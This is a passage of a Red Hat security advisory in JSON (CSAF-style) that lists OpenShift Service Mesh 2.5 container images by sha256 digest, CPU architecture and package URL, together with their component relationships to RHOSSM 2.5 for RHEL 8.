"name": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
